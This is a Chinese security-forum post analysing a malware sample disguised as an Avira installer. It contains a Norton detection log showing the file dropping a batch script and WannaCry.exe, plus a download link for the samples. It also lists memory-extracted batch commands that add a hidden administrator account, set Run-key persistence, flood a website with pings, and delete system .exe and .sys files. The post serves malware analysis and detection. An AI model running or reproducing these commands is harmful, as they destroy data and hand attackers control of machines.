本帖最后由 BE_HC 于 2018-1-13 17:11 编辑
沙箱环境----
衍生物(密码123):https://pan.lanzou.com/i0d58ij----
诺顿(Norton)主防杀
文件名: avira_zhcn_av_5a50c89d79a90__ws.exe
威胁名称: SONAR.Heuristic.170
完整路径: c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe
____________________________
来源: 外部介质
源文件:
avira_zhcn_av_5a50c89d79a90__ws.exe
___________________________
系统设置操作
事件: 进程启动 (执行者 c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe, PID:1412) 未尝试修复
c:\Users\administrator\AppData\Local\Temp\ 9C4E.tmp (执行者 c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe, PID:1412) 未尝试修复
c:\Users\administrator\AppData\Local\Temp\9C4E.tmp\ 9C4F.tmp (执行者 c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe, PID:1412) 未尝试修复
c:\Users\administrator\AppData\Local\Temp\9C4E.tmp\9C4F.tmp\ 9C50.bat (执行者 c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe, PID:1412) 未尝试修复
事件: PE 文件创建: c:\Users\administrator\documents\ WannaCry.exe (执行者 c:\users\administrator\desktop\avira_zhcn_av_5a50c89d79a90__ws.exe, PID:1412) 未尝试修复
----
内存提取字符串(cmd.exe)
- [ANSI] 0x00026640: tracert bbs.huorong.cn
- [ANSI] 0x00026659: racert www.xyyao.com
- [ANSI] 0x0002666f: tracert bbs.kafan.cn
- [ANSI] 0x00026685: tracert www.bayuxuexiao.com
- [ANSI] 0x000266a2: tracert www.bayuxuexiao.net
- [ANSI] 0x000266bf: net user %username% %username%
- [ANSI] 0x000266e5: net user %username%%username%%username% /add
- [ANSI] 0x00026716: net localgroup Administrators %username%%username%%username% /add
- [ANSI] 0x0002675c: net user %username%%username%%username% /active:yes
- [ANSI] 0x00026794: shutdown -r -t 3
- [ANSI] 0x000267f9: \a.bat
- [ANSI] 0x00026801: copy %0 c:\autoexec.bat
- [ANSI] 0x0002681a: REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
- [ANSI] 0x00026894: REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f
- [ANSI] 0x00026c3d: set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
- [ANSI] 0x00026c74: for %%a in (%a%) do subst %%a: d:\fly >nul 2>nul
- [ANSI] 0x00026fb0: set p=%~ps0
- [ANSI] 0x00026fd7: del %~fs0
- [ANSI] 0x00027001: goto x
- [ANSI] 0x00027009: set a=0
- [ANSI] 0x00027017: set /a a=%a%+1
- [ANSI] 0x00027027: echo laji >C:\%a%.txt
- [ANSI] 0x0002703e: goto 22
- [ANSI] 0x00027047: start Speed.bat
- [ANSI] 0x00027058: ping www.bayuxuexiao.com -l 65500 -t
- [ANSI] 0x000270a0: del /f /s /q %systemdrive%\*.exe
- [ANSI] 0x000270c3: del /f /s /q %systemdrive%\*.sys
- *[ANSI] 0x000270e6: TASKKILL /f /IM explorer.exe
复制代码
|